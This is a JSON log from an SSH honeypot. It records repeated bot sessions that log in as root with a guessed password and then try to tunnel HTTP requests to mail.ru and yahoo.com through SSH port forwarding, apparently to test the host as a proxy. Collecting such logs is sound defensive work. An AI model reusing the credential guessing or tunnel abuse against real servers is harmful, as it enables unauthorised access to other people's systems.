{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:49:34.680899Z","src_ip":"77.83.207.83","session":"d24879e16bbf"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:49:34.731200Z","src_ip":"77.83.207.83","session":"d24879e16bbf"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:49:34.978419Z","src_ip":"77.83.207.83","session":"d24879e16bbf"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"90.156.232.4","dst_port":80,"src_ip":"77.83.207.83","src_port":24731,"message":"direct-tcp connection request to 90.156.232.4:80 from 127.0.0.1:24731","sensor":"my-vps","timestamp":"2025-08-31T03:49:35.029029Z","session":"d24879e16bbf"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"90.156.232.4","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 90.156.232.4:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:49:35.078802Z","src_ip":"77.83.207.83","session":"d24879e16bbf"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"89.221.239.1","dst_port":80,"src_ip":"77.83.207.83","src_port":13715,"message":"direct-tcp connection request to 89.221.239.1:80 from 127.0.0.1:13715","sensor":"my-vps","timestamp":"2025-08-31T03:49:35.219952Z","session":"d24879e16bbf"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"89.221.239.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 89.221.239.1:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:49:35.269675Z","src_ip":"77.83.207.83","session":"d24879e16bbf"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:24:120d::1:0","dst_port":80,"src_ip":"77.83.207.83","src_port":31787,"message":"direct-tcp connection request to 2001:4998:24:120d::1:0:80 from 127.0.0.1:31787","sensor":"my-vps","timestamp":"2025-08-31T03:49:35.411827Z","session":"d24879e16bbf"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:24:120d::1:0","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:24:120d::1:0:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:49:35.461771Z","src_ip":"77.83.207.83","session":"d24879e16bbf"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:49:35.512579Z","src_ip":"77.83.207.83","session":"d24879e16bbf"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":10223,"dst_ip":"1.2.3.4","dst_port":22,"session":"fb40523fec2b","protocol":"ssh","message":"New connection: 77.83.207.83:10223 (1.2.3.4:22) [session: fb40523fec2b]","sensor":"my-vps","timestamp":"2025-08-31T03:49:35.561363Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:49:35.562231Z","src_ip":"77.83.207.83","session":"fb40523fec2b"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:49:35.612051Z","src_ip":"77.83.207.83","session":"fb40523fec2b"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:49:35.859794Z","src_ip":"77.83.207.83","session":"fb40523fec2b"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"90.156.232.4","dst_port":80,"src_ip":"77.83.207.83","src_port":9453,"message":"direct-tcp connection request to 90.156.232.4:80 from 127.0.0.1:9453","sensor":"my-vps","timestamp":"2025-08-31T03:49:35.910394Z","session":"fb40523fec2b"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"90.156.232.4","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 90.156.232.4:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:49:35.960355Z","src_ip":"77.83.207.83","session":"fb40523fec2b"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"89.221.239.1","dst_port":80,"src_ip":"77.83.207.83","src_port":25824,"message":"direct-tcp connection request to 89.221.239.1:80 from 127.0.0.1:25824","sensor":"my-vps","timestamp":"2025-08-31T03:49:36.100237Z","session":"fb40523fec2b"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"89.221.239.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 89.221.239.1:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:49:36.150150Z","src_ip":"77.83.207.83","session":"fb40523fec2b"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:24:120d::1:0","dst_port":80,"src_ip":"77.83.207.83","src_port":31513,"message":"direct-tcp connection request to 2001:4998:24:120d::1:0:80 from 127.0.0.1:31513","sensor":"my-vps","timestamp":"2025-08-31T03:49:36.292157Z","session":"fb40523fec2b"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:24:120d::1:0","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:24:120d::1:0:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:49:36.341929Z","src_ip":"77.83.207.83","session":"fb40523fec2b"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:49:36.392818Z","src_ip":"77.83.207.83","session":"fb40523fec2b"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":10312,"dst_ip":"1.2.3.4","dst_port":22,"session":"9cd59947a00d","protocol":"ssh","message":"New connection: 77.83.207.83:10312 (1.2.3.4:22) [session: 9cd59947a00d]","sensor":"my-vps","timestamp":"2025-08-31T03:49:36.442230Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:49:36.443209Z","src_ip":"77.83.207.83","session":"9cd59947a00d"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:49:36.493494Z","src_ip":"77.83.207.83","session":"9cd59947a00d"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:49:36.743330Z","src_ip":"77.83.207.83","session":"9cd59947a00d"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"185.180.201.1","dst_port":80,"src_ip":"77.83.207.83","src_port":12237,"message":"direct-tcp connection request to 185.180.201.1:80 from 127.0.0.1:12237","sensor":"my-vps","timestamp":"2025-08-31T03:49:36.794393Z","session":"9cd59947a00d"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"185.180.201.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 185.180.201.1:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:49:36.844713Z","src_ip":"77.83.207.83","session":"9cd59947a00d"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"185.180.201.1","dst_port":80,"src_ip":"77.83.207.83","src_port":16618,"message":"direct-tcp connection request to 185.180.201.1:80 from 127.0.0.1:16618","sensor":"my-vps","timestamp":"2025-08-31T03:49:36.988491Z","session":"9cd59947a00d"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"185.180.201.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 185.180.201.1:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:49:37.038749Z","src_ip":"77.83.207.83","session":"9cd59947a00d"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"src_ip":"77.83.207.83","src_port":20610,"message":"direct-tcp connection request to 2001:4998:44:3507::8000:80 from 127.0.0.1:20610","sensor":"my-vps","timestamp":"2025-08-31T03:49:37.180493Z","session":"9cd59947a00d"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:44:3507::8000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:49:37.230744Z","src_ip":"77.83.207.83","session":"9cd59947a00d"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:49:37.281437Z","src_ip":"77.83.207.83","session":"9cd59947a00d"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":10411,"dst_ip":"1.2.3.4","dst_port":22,"session":"044143ac6621","protocol":"ssh","message":"New connection: 77.83.207.83:10411 (1.2.3.4:22) [session: 044143ac6621]","sensor":"my-vps","timestamp":"2025-08-31T03:49:37.329626Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:49:37.339860Z","src_ip":"77.83.207.83","session":"044143ac6621"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:49:37.379207Z","src_ip":"77.83.207.83","session":"044143ac6621"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:49:37.626956Z","src_ip":"77.83.207.83","session":"044143ac6621"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"89.221.239.1","dst_port":80,"src_ip":"77.83.207.83","src_port":19346,"message":"direct-tcp connection request to 89.221.239.1:80 from 127.0.0.1:19346","sensor":"my-vps","timestamp":"2025-08-31T03:49:37.678610Z","session":"044143ac6621"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"89.221.239.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 89.221.239.1:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:49:37.728912Z","src_ip":"77.83.207.83","session":"044143ac6621"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.231.21","dst_port":80,"src_ip":"77.83.207.83","src_port":13281,"message":"direct-tcp connection request to 74.6.231.21:80 from 127.0.0.1:13281","sensor":"my-vps","timestamp":"2025-08-31T03:49:37.871877Z","session":"044143ac6621"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.231.21","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 74.6.231.21:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:49:37.921479Z","src_ip":"77.83.207.83","session":"044143ac6621"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"src_ip":"77.83.207.83","src_port":19989,"message":"direct-tcp connection request to 2001:4998:44:3507::8000:80 from 127.0.0.1:19989","sensor":"my-vps","timestamp":"2025-08-31T03:49:38.063838Z","session":"044143ac6621"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:44:3507::8000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:49:38.113561Z","src_ip":"77.83.207.83","session":"044143ac6621"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:49:38.163957Z","src_ip":"77.83.207.83","session":"044143ac6621"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":10498,"dst_ip":"1.2.3.4","dst_port":22,"session":"ae1b2d81f1f0","protocol":"ssh","message":"New connection: 77.83.207.83:10498 (1.2.3.4:22) [session: ae1b2d81f1f0]","sensor":"my-vps","timestamp":"2025-08-31T03:49:38.216925Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:49:38.227086Z","src_ip":"77.83.207.83","session":"ae1b2d81f1f0"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:49:38.270182Z","src_ip":"77.83.207.83","session":"ae1b2d81f1f0"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:49:38.535493Z","src_ip":"77.83.207.83","session":"ae1b2d81f1f0"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"185.180.201.1","dst_port":80,"src_ip":"77.83.207.83","src_port":32045,"message":"direct-tcp connection request to 185.180.201.1:80 from 127.0.0.1:32045","sensor":"my-vps","timestamp":"2025-08-31T03:49:38.589508Z","session":"ae1b2d81f1f0"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"185.180.201.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 185.180.201.1:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:49:38.642828Z","src_ip":"77.83.207.83","session":"ae1b2d81f1f0"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"98.137.11.163","dst_port":80,"src_ip":"77.83.207.83","src_port":7933,"message":"direct-tcp connection request to 98.137.11.163:80 from 127.0.0.1:7933","sensor":"my-vps","timestamp":"2025-08-31T03:49:38.791501Z","session":"ae1b2d81f1f0"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"98.137.11.163","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 98.137.11.163:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:49:38.844725Z","src_ip":"77.83.207.83","session":"ae1b2d81f1f0"}
